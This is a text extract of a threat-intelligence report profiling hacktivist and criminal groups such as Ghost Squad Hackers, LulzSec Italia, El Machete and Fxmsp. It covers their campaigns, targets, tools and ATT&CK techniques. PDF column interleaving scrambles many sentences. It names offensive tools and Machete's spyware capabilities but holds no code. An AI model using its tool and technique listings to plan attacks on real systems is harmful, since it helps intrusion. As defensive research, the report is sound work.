Sprek3rsSec Government Agencies Ideology
Cyber Terrorist
TAG-HA17 Media
Hacktivist
State Sponsored
Unknown
28 Language
Portuguese
DESCRIPTION
ASprek3rsSec is a Brazilian hacktivist which opreated between 2016-2017. The threat actor seems to possess low to
active from 2014. Sprek3rsSec mostly From 2019 is part of a group called medium hacking skills, mostly relying on
target Brazilian websites for defacement !PHALLANX!. While mostly flying under the SQLi techniques and XSS vulnerabilities
and data leak attacks. In the past the actor radar, the threat actor bought his publicity
was part of a group called Evil Corp BR in the 2019 #OpAmazonia campaign.
CAMPAIGNS
2014-2017 - Defacement 2019 - #OpAmazonia 2014
From the start of his activities the threat Sprek3rsSec took part in #OpAmazonia, 2014-2017
Defacement
actor focused on defacements of random a hacktivist operation to protest against 2015
websites, with the majority of them from the burning of the rain forest. As part
the BR tld (Brazilian websites) of the operation Sprek3rsSec, as part 2016
of PHALLANX, allegedly hacked several
ministry offices and leak data from them.
2017
Among the hacked targets was the ministry
of environment, according to the group
they were able to find proof that the 2018
Brazilian government started the fire in

the amazon forest 2019 2019
#OpAmazonia
2020

DarknessGhost
None Identified
SQLMAPd

Targeted
Countries _
Brazil N
ew
France Zealand
Gabon Poland
India Thailand
Mexico
Brazil
Initial Access Persistence Impact

T1190 - Exploit Public-Facing Application T1100 - Web Shelln T1491 - Defacement
Execution Defense Evasion
T1064 - Scripting T1064 - Scripting
167
G
HOST SQUAD Education Ideology
Cyber Terrorist
HACKERS Financial Services
TAG-HA6 Hacktivist
Government Agencies
26 Media Language
Military English
The Ghost Squad Hackers, a group 2013 - present - #OpIsrael various websites of financial institutions
founded in 2016, are hacktivists from in the UK, Cameroon, Kuwait, Korea,
A pro-Palestinian and anti-Israel cyber
around the world that launched cyber- Myanmar, New Zealand and Nepal.
campaign which occurs annually on April
attacks against multiple targets around
7 since 2013. During August 2016, Ghost
the world. In 2016, they were considered June 2016 - #OpSilence
Squad Hackers claimed responsibility for
to be one of the top trending hacktivist A cyber campaign against the media sector
allegedly shutting down Israeli government
groups. Several popular cyber-attacks in order to protest against their coverage
websites.
that are affiliated with the group are the of the Israeli-Palestinian conflict. During
DDoS attacks against GitHub (January 2016 - present - #OpISIS June 2016, Ghost Squad Hackers claimed
2019), YouTube (October 2018) and / #OpReverseCaliphate / responsibility for shutting down the mail
the mail servers of CNN and FoxNews #OpDecryptIsis servers of Fox News and CNN. They also
(June 2016). A prominent group member A cyber campaign against ISIS-related published links to data leakages allegedly
dubbed S1ege developed several tools and online platforms. Ghost Squad Hackers related to the US Army. The data leakages
published their code on GitHub. targeted ISIS-related platforms on Twitter, contained personal information and email
Telegram, WhatsApp etc. and leaked accounts. In addition, they claimed they
information. shut down the website of the Prime Minister
of Israel (pmo.gov.il).
2016 - 2018 - #OpIndia
June 2016 - #OpKillary
A cyber campaign against Indian websites
and online platforms. Ghost Squad Hackers A cyber campaign against Hillary Clinton.
claimed responsibility for defaceing Indian During June 2016, Ghost Squad Hackers
government and additional websites threatened to leak personal information
between 2016 and 2018. related to Hillary Clinton and claimed
responsibility for shutting down her website
January 2016 - Targeting Ethiopian and additional websites of her funders.
government websites
July 2016 - #OpTurkey
During January 2016, Ghost Squad Hackers
defaced several Ethiopian government A cyber campaign against Turkish government
websites to protest against the violent clashed websites to protest against the Turkish
between students and the security forces. support for ISIS. During July 2016, Ghost
Squad Hackers claimed responsibility for
April 2016 - Targeting KKK shutting down Turkish government websites.
In April 2016, Ghost Squad Hackers
July 2016 - #OpAltonSterling
claimed responsibility for shutting down
a website affiliated with the KKK. A cyber campaign protesting police brutality
after that Alton Sterling, a 37-year-old
May 2016 - #OpTrump black man, was shot at close range by two
A cyber campaign against Donald Trump’s police officers in Baton Rouge, Louisiana
related websites to protest against one of in July 2016. In July 2016, Ghost Squad
his speeches. In May 2016, Ghost Squad Hackers defaced the sub domain of the
Hackers shut down Trump Hotel Collection website of Baton Rouge City.
website for several hours.
July 2016 - #OpKillingBay
May 2016 - #OpIcarus A cyber campaign against websites related
A cyber campaign against the financial to the Sea World industry and countries
sector around the world that was first that hunt sea mammals, such as Japan,
launched in February 2016. Since then, Denmark etc. In July 2016, Ghost Squad
hacktivists have launched several additional Hackers claimed responsibility for shutting
phases of this campaign over the years. down the seaworldparks.com website.
During May 2016, Ghost Squad Hackers
July & August 2016 - #OpAfghan
A cyber campaign against the government

Afghanistan New
Argentina Zealand
Bangladesh Peru
Brazil Poland
Canada South Korea
Cameroon Sudan
Cuba Syria
Ecuador Thailand
India Turkey
Israel United
Kuwait Kingdom
Myanmar United
Nepal Nations
Zimbabwe
Worldwide
of Afghanistan to protest against their Russian telecommunication company and Sudanese government and official websites.
political relationship with the USA and shutting down a website of a Russian bank.
against the situation of the Hazaras, a August 2019 - Targeting government
June 2018 - Targeting Canadian websites websites of Ecuador
Shia minority in Afghanistan and Pakistan.
During June 2018, Ghost Squad Hackers During August 2019, Ghost Squad Hackers
During July and August 2016, Ghost
hacked a server and defaced various claimed responsibility for shutting down
Squad Hackers defaced several Afghan
Canadian websites. government websites of Ecuador in order to
government websites and hacked the
Twitter account of Afghanistan’s Chief June2018 -TargetingCubanwebsites protest against Julian Assange’s extradition
Executive Officer Dr. Abdullah Abdullah. in April 2019.
During June 2018, Ghost Squad Hackers
October 2016 - #OpSyria hacked a server and defaced various 2013 2013
Cuban websites. #OpIsrael
A cyber campaign against the Syrian
government to protest against the war June 2018 - Targeting websites of
crimes that were held there. During October Bangladesh government
2016, Ghost Squad Hackers claimed During June 2018, Ghost Squad Hackers
responsibility for shutting down Syrian defaced several websites belong to the
government websites. government of Bangladesh. ### 2018
2014
November 2016 - #NODAPL - Targeting Polish websites In June 2018,

A cyber campaign that supports the protests Ghost Squad Hackers defaced a Polish
against Dakota Access Pipeline. During government website.
November 2016, Ghost Squad Hackers July 2018 - Targeting Argentinian
claimed responsibility for shutting down websites 2015
several United Nations-related websites

During July 2018, Ghost Squad Hackers 2016
and called the organization to stop oil
defaced various Argentinian government, #OpISIS /
companies from ruining U.S. water. #OpReverseCaliphate
educational and additional websites. Jan-2016 / #OpDecryptIsis
January 2017 - #OpThailand August2018-TargetingZimbabwean
Targeting Ethiopian
government
2016
A cyber campaign against websites related websites 2016 websites
#OpIndia
to the Thai government. During January
In August 2018, Ghost Squad Hackers Apr-2016
May-2016 May-2016
2017, Ghost Squad Hackers claimed
defaced a website related to the government Targeting KKK
#OpTrump #OpIcarus
responsibility for defacing various Thai
of Zimbabwe.
government websites. Jun-2016 Jun-2016 Jul-2016
October 2018 - Targeting YouTube #OpSilence #OpKillary #OpTurkey
May - August 2018 - #OpPeru 2017
In October 2018, a member of Ghost Nov-2016 Oct-2016 Jul-2016
A cyber campaign against Peruvian websites.
Squad Hackers, Hax Stroke, claimed #NODAPL #OpSyria #OpAltonSterling
In May and August 2018, Ghost Squad
responsibility for shutting down YouTube Jul-2016
Hackers claimed responsibility for defacing Jan-2017
website, that suffered from an outage and #OpKillingBay
various Peruvian websites related to #OpThailand
was unavailable for an hour. However,
government and educational institutions. 2018 Feb-2018-2019 Jul-Aug-2016
they did not provide any proof that they 2018 #OpAfghan
#OpBrazil #OpSudan
2018 - #OpBrazil were caused the outage.
May-Aug-2018 May-2018
A cyber campaign against the Brazilian January 2019 - Targeting GitHub #OpPeru #OpRussia
government. During 2018, Ghost Squad Jun-2018
In January 2019, a member of Ghost Jun-2018 Jun-2018
Hackers claimed responsibility for defacing Targeting websites
Squad Hackers, Hax Stroke, claimed Targeting Canadian Targeting Cuban of Bangladesh
and leaking information allegedly related websites websites government
responsibility for shutting down GitHub
to the Brazilian government. 2019
while abusing RPCBIND services to carry Jul-2018 Aug-2018
May 2018 - #OpRussia out a massive DDoS attack. Targeting

Argentinian
Targeting
Zimbabwean Oct-2018
websites websites
A cyber campaign against Russian websites February 2018 - 2019 - #OpSudan
Targeting YouTube
because the Russian government blocked Jan-2019 Aug-2019

A cyber campaign that supports the protests
the use of Telegram in the country. During Targeting GitHub Targeting
against the Sudanese government. During government
May 2018, Ghost Squad Hackers claimed 2020 websites of
February 2019, Ghost Squad Hackers Ecuador
responsibility for defacing the website of a
169
G
HOST SQUAD Education Ideology
Cyber Terrorist
HACKERS Financial Services
TAG-HA6 Hacktivist
Government Agencies
26 Media Language
Military English

Custom tools RPCBIND Abusing None Identified
hostSquadHackers-Javascript-
G
Encrypter-Encoder.
hostDelivery
G
edGhost Linux post exploitation
R
framework
Saphyra DDoS Tool
MILNET
None Identified

Afghanistan New
Argentina Zealand
Bangladesh Peru
Brazil Poland
Canada South Korea
Cameroon Sudan
Cuba Syria
Ecuador Thailand
India Turkey
Israel United
Kuwait Kingdom
Myanmar United
Nepal Nations
Zimbabwe
Worldwide
Collection
Impact
T1491 - Defacement
171
LORIAN SYNARO Government Agencies Ideology
Cyber Terrorist
@LORIANSYNARO
TAG-HA15 Hacktivist
State Sponsored
Unknown
26 Language
English
DESCRIPTION
Lorian Synaro is a hacktivist threat actor He mainly publishes claims that he had is highly engaged in promoting hacktivist
affiliated with the Anonymous collective. taken offline target websites, although he campaigns and sharing the activities of
He is active since at least March 2018, has also claimed to have defaced multiple his fellow hacktivists.
when he joined Twitter. Lorian Synaro has websites, as well as leaking information
taken part in various hacktivist campaigns. from targeted organizations. In addition, he

None Identified
None Identified
None Identified

Targeted
Countries _
Congo S
audi
France Arabia
Gabon Spain
Honduras Sudan
Israel Venezuela
Nicaragua Zimbabwe
Unknown
CAMPAIGNS
2018 - Present - #OpIsrael 2018 - #OpYemen 2019 - #OpHonduras
A pro-Palestinian and anti-Israel cyber A hacktivist cyber operation against Saudi A hacktivist campaign against the allegedly
campaign which occurs annually on April Arabia in protest against the Saudi-led oppressive and tyrannical regime in the
7 since 2013. Lorian Synaro has claimed intervention in Yemen that allegedly resulted country. Lorian Synaro has claimed he had
to have taken offline many Israeli websites, in the starvation of Yemen’s population. taken offline two governmental websites
although he has also taken responsibility for Lorian Synaro has claimed he have taken and defaced one.
defacements and shared some data leaks. offline the website of House of Saud, the
royal family of Saudi Arabia. 2018
2018 - #OpIcarus
#OpIcarus is a hacktivist cyber operation 2018 - #OpGabon 2018-present 2018-present
#OpIsrael #OpNicaragua
launched by Anonymous in 2016 against A hacktivist campaign by Anonymous against
websites and services associated with the Gabonese targets in protest against the 2018
global financial system. Lorian Synaro has alleged ritual killings of Gabonese citizens #OpIcarus
2018
mainly taken responsibility for taking offline and the alleged dictatorship in the country. #OpCatalunya
various websites of financial institutions Lorian Synaro has published various claims #OpCatalonia
2018
and banks. he had taken offline Gabonese websites.
#OpVenezuela
2018
2018 - Present - #OpNicaragua 2018 - #OpCongo #OpKhashoggi,
#OpSaudi,
A hacktivist campaign against the government A hacktivist cyber operation against the #OpSaudiArabia
of Nicaragua in protest against its alleged oppression and dictatorship in Congo, 2018
#OpYemen
repression of protest movements in the according to Lorian Synaro. Lorian Synaro 2018
country. Lorian Synaro is highly active in has published various claims he had taken #OpGabon
this campaign, publishing claims for taking offline Congolese governmental websites. 2018
offline many Nicaraguan governmental #OpCongo
targets, sharing data leaks and claiming 2018 - #OpFrance 2018

to have defaced various websites. A hacktivist campaign first launched by #OpFrance
Anonymous in solidarity with the Yellow Vests 2018-present

2018 - #OpCatalunya#OpCatalonia Movement (Mouvement des gilets jaunes) #OpSudan
A hacktivist cyber campaign first launched in France. Lorian Synaro has claimed he
2019
in 2017 against Spanish targets in support had taken offline several French websites
of Catalonia’s independence. Lorian as part of this campaign.
Synaro mainly published claims for the
taking offline of various Spanish websites. 2018 - Present - #OpSudan
A cyber campaign that supports the protests
2018 - #OpVenezuela against the Sudanese government. Lorian
A hacktivist campaign against the Venezuelan Synaro was highly active in promoting this
government. Lorian Synaro published campaign and has extensively participated 2019
#OpZimbabwe
several claims that he had taken offline in it. He has taken part in taking offline,
multiple Venezuelan governmental websites defacing and leaking information as part
as part of this campaign. of the campaign, and also shared the
activities of his fellow hacktivists.
2018 - #OpKhashoggi, #OpSaudi, 2019
#OpSaudiArabia 2019 - #OpZimbabwe #OpHonduras
A cyber campaign against Saudi Arabia, that A hacktivist campaign against the government
was launched by Anonymous in October of Zimbabwe. Lorian Synaro has taken
2018 in response to the assassination responsibility for the taking offline of a
of Saudi journalist Jamal Khashoggi in few governmental websites and websites
the Saudi consulate in Istanbul. Lorian of financial organizations in Zimbabwe.
Synaro has published various claims he
had taken offline Saudi websites, and he
also shared some data leaks as part of 2020
the campaign.
173
LORIAN SYNARO Government Agencies Ideology
Cyber Terrorist
@LORIANSYNARO
TAG-HA15 Hacktivist
State Sponsored
Unknown
26 Language
English

Targeted
Countries _
Congo S
audi
France Arabia
Gabon Spain
Honduras Sudan
Israel Venezuela
Nicaragua Zimbabwe
Unknown
Collection
Impact
T1491 - Defacement
175
El Machete Defense Cyber espionage
Cyber Terrorist
Machete Energy
TAG-NS1 Hacktivist
Government Agencies
State Sponsored Military
Unknown
Language
25
Spanish
DESCRIPTION
El Machete is a cyber espionage group European countries, USA and Korea. The It is unclear if they are a nation sponsered
that has been active since 2010. They source code of the group's malware, usually group of cybercriminals that sells stolen
usually terget the government and military distributed in sophisticated spear-phishing sensitive information.
sectors in Latin America, but also in several attacks, indicates they are spanish-speakers.
CAMPAIGNS
2010-2014
2010-2014 - Machete targets March - May 2019 - Targeting 2010 Machete targets
intelligence
intelligence services and government military and official institutions in services and
government
2011
institutions in Latin America and Spain Venezuela and Ecuador institutions in Latin
America and Spain
During this campaign, the group distributed During 2019, El Machete continued to 2012
the Machete malware with malicious target high profile targets in Latin America,
PowerPoint presentations and social specifically in Venezuela, where sensitive 2013
engineering techniques that also included information related to the country's military
a fake blog. They attacked Venezuela, and official institutions was stolen, and also 2014
Ecuador, Colombia, Peru, Cuba, Spain in Ecaudor. During this campiagn they used
and Russia, where embassies of Latin a new version of the Machete malware 2015
American countries were detected. that was first detected in April 2018. The
malware was spread by spear-phishing 2016
2017 - Machete cyber espionage attacks, while using real documents that
campaigns have been stolen from previous attacks. 2017 2017
Machete cyber
Machete launch cyber espionage campaigns In addition, they used Radiogramas, espionage
campaigns
against government, utilities and military documents used for communication in 2018
sectors in Latin American countries but also Mar-May-2019

the military forces, while using military Targeting military
2019
Canada, Korea, the USA and European jargon and etiquette in order to create and official
countries, such as Germany, United institutions in
sophisticated phishing emails. 2020
Venezuela and
Kingdom and Russia. Ecuador

Machete Microsoft Office None
Self developed malware coded in Python that has PowerPoint
downloader and backdoor components. The malware
is capable of the following cyber-espionage operations:
- Logging keystrokes
- Capturing audio from the computer’s microphone
- Capturing screenshots
- Capturing geolocation data
- Taking photos from the computer’s web camera
- Copying files to a remote server
- Copying files to a special USB device if inserted
- Hijacking the clipboard and capturing information
from the target machine

Argentina Germany
Belgium Guatemala
Bolivia Korea
Brazil Nicaragua
Canada Peru
China Spain
Colombia Ukraine
Cuba United States
Ecuador Venezuela
France
Latin America

T1189 - Drive-by Compromise T1056 - Input Capture T1043 - Commonly Used Port
T1192 - Spearphishing Link Discovery T1071 - S tandard Application Layer
T1193 - Spearphishing Attachment Protocol
T 1120 - Peripheral Device Discovery
Execution T1105 - Remote File Copy
T1217 - Browser Bookmark Discovery
T1053 - Scheduled Task Exfiltration
Lateral Movement
Persistence T1002 - Data Compressed
T1053 - Scheduled Task Collection T1048 - E xfiltration Over Alternative
Privilege Escalation T1005 - Data from Local System Protocol
T1053 - Scheduled Task T1025 - Data from Removable Media T1052 - Exfiltration Over Physical Medium
Defense Evasion T1056 - Input Capture
T1027 - Obfuscated Files or Information T1113 - Screen Capture
T1036 - Masquerading T1115 - Clipboard Data
T1140 - Deobfuscate/Decode Files or T1119 - Automated Collection
Information T1123 - Audio Capture
177
Communication
LulzSec Italia Cyber-security Ideology
Cyber Terrorist
LulzSecITA Defense Unpredictable
Hacktivist Education
Lulz Security Italy Government Agencies
TAG-HA1 State Sponsored Healthcare
High-Tech
Media Language
25 Military
Pharmaceutical Italian
Research
Labor Unions
DESCRIPTION
LulzSec Italia is an Italian hacktivist collective Italia also embraces an anarchist ideology This observation is strengthened by the
that has dominated, alongside with other and conducts attacks for “fun.” Nonetheless, recent alliance established by the group with
groups (e.g. Anonymous Italia, AntiSec we always identify a clear political/social Anonymous Italia, in 2018, a significantly
Italia, and AnonPlus), the Italian hacktivist motive behind the attacks, denoting a more ideology-driven group. With regards
landscape during the past decade. We digression from the mainstream conduct to the types of attacks performed by LulzSec
tracked the activity of the group back to of the global LulzSec movement. In this Italia, the group was observed conducting
2011, when the first attacks against multiple regard, the group also engages in real-life mainly data leaks, defacements, and rarely
Italian universities were registered. In line demonstrations (e.g. OpPaperstormITA). DDoS attacks.
with the global LulzSec movement, LulzSec
CAMPAIGNS
2011 - ongoing - #OpGreenRights February 2018 - Il Messaggero 2011 2011-ongoing 2011-ongoing
#OpGreenRights #OperationItaly
Campaign Attack campaign campaign
A cyber/real-world campaign protesting The hackers leaked sensitive data from

alleged environmental crimes perpetrated the Italian newspaper Il Messaggero’s 2012
by multinational companies. In this context, servers, publishing it online.
the hacker launched several operations
against Italian organizations perceived in March 2018 - Italian Ministry of
violation of environmental rights. Education Attacks 2013
The hackers stole 26,600 personal details of

2011 - ongoing #OperationItaly the Italian Ministry of Education, University
Campaign and Research (MIUR) personnel.
2014
A cyber campaign against the Italian
political system and institutions. In February July 2018 - #OpSafePharma
2016, the hacktivist DDoS’ed the Italian Campaign
Parliament website (parlamento.it). In A cyber campaign against the pharmaceutical 2015
February 2017, LulzSec defaced a website sector, in general, and its treatment of
related to the Italian Ministry of Justice patients affected by ADHD, in particular.
(camerepenali.it). In May 2017, the hackers For instance, in July 2018 LulzSec hacked
leaked sensitive data stored on the Italian the servers of hospitals and pharmaceutical 2016
Foreign Ministry servers. organizations, leaking online sensitive data.
November2018-#FifthOfNovember/ September 2018 - INAS Attack Jul-2018

#OpSafePharma
OpBlackWeek Campaign In September 2018, the hackers leaked 2017 campaign
A cyber/real-world campaign commemorating personal details of 37,500 individuals

Sep-2018
the Guy Fawkes Night. In this context, LulzSec from the Italian Confederation of Workers’ Feb-2018 INAS attack
launched numerous attacks against the Trade Unions servers. Il Messaggero
2018
Attack 2018
education, labor, healthcare, administration, May 2019 - Rome Lawyers #OpPaperstormITA
and political sectors. Mar-2018 Campaign
In May 2019 the hackers leaked sensitive Italian Ministry of
2018 - #OpPaperstormITA Campaign data of Rome lawyer’s association, including 2019
Education attack Nov-2018
A real-world campaign aimed at distributing the personal details of the city’s mayor #FifthOfNovember/
May-2019 OpBlackWeek
antigovernment messages through flayers Virginia Raggi. Campaign
Rome Lawyers
and graffiti around Italy. The hackers
2020
promoted the initiative multiple times on
their social media profiles.

Targeted
Countries _
Italy
Italy
Initial Access Impact

T1190 - Exploit Public-Facing Application T1491 - Defacement

Custom tools None Identified CVE-2018-12711
FuckingBotnet CVE-2018-12712
KLTools
None Identified
SQLMap (allegedly)
SQLninja (allegedly)
179
HABIL MOONZ Cyber-security Ideology
Cyber Terrorist
INDONESIALINUXER Government Agencies
MOONZLINUXER Hacktivist
High-Tech
MRMOONZ State Sponsored
TAG-HA13
Unknown
Language
24 English and Indonesian
DESCRIPTION
MrMoonz (Habil Moonz) is an Anonymous and Instagram accounts, he is a student government and financial sectors, he also
affiliated Indonesian hacktivist who describes at the public university, Institut Teknologi carried out a cyber-attack against two
himself as an exploiter, network security Bandung Kampus Jatinangor. During May- ICS systems of Indonesian companies
and pentester that specializes on Linux. June 2019, he targeted the Indonesian via Metasploit commands and promised
He was a member of the hacktivist group government during the #OpIndonesia to cause a blackout.
Rabbit Security Team, which mainly defaced cyber campaign. Moreover, unlike other
websites. Also, according to his Facebook hacktivists that are usually focused on the
CAMPAIGNS
2013 - present - #OpIsrael 21, 2019. MrMoonz pubslihed a target 2013 2013-present
A pro-Palestinian and anti-Israel cyber list of Indonesian government websites and 2014
#OpIsrael
campaign which occurs annually on April DDoS tools. He also took responsibility
7 since 2013. MrMoonz published tweets for shutting down one of the Indonesian 2015
that support the campaign. government websites mentioned in this 2016

list. Moreover, he threatened to publish
2019 - #OpIndonesia 58GB of sensitive data and provided a 2017
A cyber campaign launched to protest screenshot of a folder containing images

2018
against the violent clashes caused after of identification documents that apparently
the Indonesian elections (April 17, 2019) belong to Indonesian citizens. In addition, 2019
2019
and the announcement of the Indonesian he used Metasploit commands against two #OpIndonesia
2020
General Elections Commission on May ICS systems of Indonesian companies.

Custom tools targets network layer 7 to carry out an grok The tool exposes local servers
n
None Identified HTTP flood DDoS attack. The tool that behind NATs and firewalls to the public
Tools used by multiple adversaries was developed by the hacktivist HaX internet over secure tunnels. MrMoonz
None Identified StroKE is available on pastebin. According uses this tool to expose the DarkComet
to news reports, it was used for taking RAT controller to the web
down NASA website in 2016.
Metasploit An open-source framework Exploited vulnerabilities
used for penetration testing TheFatRat A Backdoor creator for remote
None Identified
access. The tool is available on GitHub.
WarChild A denial of service testing
suite made for analyzing the strength DarkComet RAT A popular remote
of a website against different kinds of access trojan developed by a French
denial of service attacks. The tool is programmer. The tool was available on
available on GitHub. its official website until August 2018.
Memcrashed-DDoS-Exploit A DDoS attack rc-exploiter Resource file services
tool that sends forged UDP packets to exploiter, which is a framework that
vulnerable Memcached servers obtained scans WAN networks for targets and tries
using Shodan API. The tool is available to automatically exploit open services
on GitHub. on each target. The tool is available
on GitHub.
Saphyra (iDDoS Private Tool) This Tool

Targeted
Countries _
Indonesia
Israel
Indonesia
Execution Credential Access Impact

T1203 - Exploitation for Client Execution T1110 - Brute Force T1491 - Defacement
181
A
NONYMOUS Cyber Criminal Energy & Objectives _
ARGENTINA Energy Ideology
Cyber Terrorist
A
TK 122
Government Agencies
T
AG-HA5 Hacktivist
I nternational
State Sponsored Organizations
Unknown Political Organizations
Language
23 Spanish
DESCRIPTION
Anonymous Argentina is apparently a low- is not very active, and mainly engages campaigns related to South America that
skilled hacktivists group that is associated in minor defacement and data leaks of are carried out by Anonymous groups.
with the Anonymous collective, operating in government-related institutions in South
Argentina since at least 2012. The group America (mainly Argentina), mainly during
CAMPAIGNS
2015 - Present - #OpArgentina hundreds of records containing names, 2015
OpArgentina is an Anonymous campaign emails and passwords from the Ecuadorian

power distribution company (Empresa 2015
against the Argentinean administration. In #OpArgentina
2015, the group claimed to have successfully Eléctrica Regional del Sur). The information
executed a DoS attack and taken down the was published on PasteBin. 2016
official site of then-president of Argentina,

2019 - #OpNeoNazi
Cristina Fernández de Kirchner, among
As part of the OpNeoNazi campaign,
other politicians’ websites. In 2019, the
targeting neo-Nazi groups, the group 2017
group leaked a small number of credentials
claimed responsibility for taking down a
from the Argentinean customs broker
site of an Argentinean neo-Nazi group.
center (CDA) as part of the campaign
and published the information on the 2019 - #OpStopWarCorea 2018
text sharing platform PasteBin. The group As part of the OpStopWarCorea campaign
claimed to have the database of the CDA carried out by various Anonymous groups,
and the Argentinean Mission Police site the group claimed responsibility for taking
database. In addition, the group also down the Mexican government-related 2019
claimed to have taken down several other 2019
Sonoran Institute of Culture. #OpNeaNazi
Argentinean government-related websites.
2019
2019 - #OpEcuador - FreeAsange #OpStopWarKorea
2020
As a part of the OpEcuador / FreeAsange
campaign, the group leaked a couple

None Identified
None Identified
None Identified

Targeted
Countries _
Argentina
Ecuador
Mexico
Argentina
Initial Access Credential Access Impact

T1003 - Credential Dumping T1003 - Credential Dumping T1491 - Defacement
T1499 - Endpoint Denial of Service
183
FALLAGA TEAM Aviation Ideology
Cyber Terrorist
TAG-CT4 Communication Revenge
Hacktivist Construction
State Sponsored Education
Financial Services
Healthcare Language
23
Hospitality Arabic
Media
DESCRIPTION
Fallaga Team is a Tunisian Islamist hacker were also Fallaga warriors in Algeria. The of the group and use its name and logo.
group. Their goal is to spread the word of character in the group’s logo resembles The group mainly performed defacements,
Islam and help all the Muslims. Fallaga the original Fallaga fighters. According data leaks, and DDoS attacks. The group
Teams claims it not an extension of the to Fallaga Teams’ Facebook page, the was known in its attacks against Israeli
Islamic State (ISIS), although its Facebook group is active since at least July 2010. websites, especially within of #OpIsrael
page states that it shares similar religious Apparently the group is no longer active attacks. However, it attacked multiple
and political ideals. The group is named and it ceased to operate. However, some other websites around the globe.
after the anti-colonial movement that fought threat actors that identified with the group
for the independence of Tunisia, there are still performing cyber attacks behalf

LOIC Fallaga
None Identified
None Identified

Targeted
Countries _
Australia Russia
Belgium Thailand
France Tunisia
Hungary U
nited
Ireland Kingdom
Israel U
nited
Italy States
Pakistan
Tunisia
CAMPAIGNS
May 2013 - OpUSA August 2015 - Thai Government 2013
Cyber attacks that were planned for May Websites Attack

7, 2013 in response to the USA crimes in The group targeted the official government
Iraq, Afghanistan and Pakistan. Fallaga websites of four provinces, a government
Team was among the hackers that confirmed hospital and a university publishing house. May-2013
OpUSA
their participation.
November 2015 - Hungarian TV
2014 - Defacement of Russian Station Attack N1TV
Websites An Hungarian television channel was
Fallaga Team and additional three hacker attacked by the Fallaga Team in response
groups that include Cyber Caliphate, to the TV channel’s camerawoman who 2014
2014 Defacement of
Team System Dz, and Global Islamic blocked refugees who tried to flee from Russian Websites
Caliphate breached and defaced 600 police.
Russian websites. The group took down the channel’s site
January 2015 - Tunisian Websites and servers.
Attack April 2015-2016 - OpIsrael
The group claimed responsibility of hacking A pro-Palestinian and anti-Israel cyber
several Tunisian governmental websites campaign which occurs annually on April
including the Ministry of Culture and the 7 since 2013. During the campaigns,
Ministry of Transport. In addition, the Fallaga Team claimed responsibility for
Jan-2015 Jan-2015
official website of the Tunisian Internet defacing private Israeli websites and 2015
Tunisian Websites Op_France and
Agency (ATI), the former national Internet published data leaks containing information Attack Charlie Hebdo
incident
Service Provider was hacked. regarding Israelis.
January 2015 - Op_France and December 2016 - Op_zouari
Apr-2015 Apr-2015
Charlie Hebdo incident A cyber attack in response of Hamas

Belgian Website
Attack
OpIsrael
A large hacking operation targeting engineer Mohamed Zouari assassination. Aug-2015

thousands of French websites in retaliation During the campaign, the group attacked Thai Government
for the cartoons published by the satirical multiple private Israeli websites. Websites Attack
French weekly Charlie Hebdo and the Nov-2015

newspaper shooting attack. During the January 2017 - UK NHS Websites Hungarian TV
Station Attack
campaign, in which Fallga Team participated, Attack 2016 N1TV
20,000 French websites were attacked During January 2017, Fallga Team defaced
including military websites, small business six National Health Service (NHS) websites
websites, banks and more. as protest against the West’s interference
in the Middle East.
April 2015 - Belgian Website Attack
Fallaga Team attacked the Walloon January 2017 - Australian Websites
Government website, the executive branch Attack
of Wallonia, and part of one of the six During January 2017, the website of the
main governments of Belgium. Treasurer of the Australian state of Victoria Dec-2016
hacked by Fallaga Team in response to Op_zouari
2017
the killing of innocent people in Syria. In
Jan-2017 Jan-2017
addition, number of Australian school and UK NHS Websites Australian
college websites were hacked. Attack Websites Attack
185
FALLAGA TEAM Aviation Ideology
Cyber Terrorist
TAG-CT4 Communication Revenge
Hacktivist Construction
State Sponsored Education
Financial Services
Healthcare Language
23
Hospitality Arabic
Media

Targeted
Countries _
Australia Russia
Belgium Thailand
France Tunisia
Hungary U
nited
Ireland Kingdom
Israel U
nited
Italy States
Pakistan
Tunisia
Credential Access Impact

T1003 - Credential Dumping T1491 - Defacement
187
RUSSIANSEC Defense Ideology
Cyber Terrorist
@russiansec171 Education
TAG-HA7 Hacktivist
Energy
State Sponsored Food and Agriculture
Language
23
Healthcare
Portuguese
Media
Military
DESCRIPTION
RUSSIANSEC is a group of hacktivists, it linked to operations conducted together and DemonSad3 during #OpIndonesia
in activity since at least June 2019. We with other well-known adversaries such cyber campaign in 2019.
tracked the group’s activity and found that as NewSecGroup, LorianSynaro, BSSNRI
CAMPAIGNS
2019 - #OpSudan June 2019 - #OpIndonesia 2019
2019
On April 5, 2019, the group declared A cyber campaign launched to protest #OpSudan
they have joined #OpSudan - a hacktivist against the violent clashes caused after
cyber campaign against Omar Al-Bashir’s the Indonesian elections (April 17, 2019)
regime in Sudan. On this campaign, and the announcement of the Indonesian
the group targeted multiple Sudanese General Elections Commission on May 21, Jun-2019
Government-related domains and websites 2019. RUSSIANSEC claimed responsibility #OpIndonesia
and claimed responsilbity for DDos attacks for hacking and leaking data of the
and defacement of the attacked websites. Indonesian Armed Forces official website.
Of note, the attacks that were conducted,
were spread over a broad variety of sectors
that involve government activity.
2020

Custom tools SQLMAP None Identified
None Identified NMAP
None Identified
None Identified

Targeted
Countries _
Indonesia
Sudan
Russia
Credential Access Impact

T1003 - Credential Dumping T1491 - Defacement
189
ATK 134 Cyber Criminal Aviation & Objectives _
FXMSP Cyber-security Personal-gain
Cyber Terrorist
TAG-CRI7 Education
Hacktivist
Energy
State Sponsored Financial Services
Unknown Food and Agriculture
Language
Government Agencies
22 Russian, English
Manufacturing
Retail
DESCRIPTION
ATK X is a hackers group operating in standing reputation for selling sensitive breaching three top American anti-virus
popular Russian- and English-speaking information from high-profile global companies and offering the exfiltrated
underground communities, in activity since entities, mainly corporate and government data for sale in April 2019.
at least 2017. The group has a long- networks worldwide. It is mostly known for
CAMPAIGNS
October 2018 - Reliance Industries October 2018 - April 2019 - Anti 2018
Limited Virus Companies Breach

In October 2018, one of the group’s On April 24, 2019, the group claimed to
sellers dubbed BigPetya offered for sale have gained access to three leading anti-virus
access to internal servers of several entities, companies. The group extracted sensitive
including Indian giant Reliance Industries source code from antivirus software, AI,
Limited. The seller offered “full access with and security plugins belonging to the three
admin rights, all server counts and all PCs companies, namely Symantec, McAfee
on the network”, in addition to “access and Trend Micro. The group’s sellers later
to the domain controller”. offered for sale exclusive information stolen
from the anti-virus companies, including
network access and source code related Oct-2018 Oct-2018
to the companies’ software development. Reliance Industries Anti Virus
Limited Companies Breach
Actors within the group claimed that the
breach research has been their main
2019
project for six months.

Custom tools The group mainly uses available legitimate None Identified
T he group claimed to have developed its remote desktop (RPD) servers and exposed
own credential-stealing botnet capable active directories to gain access.
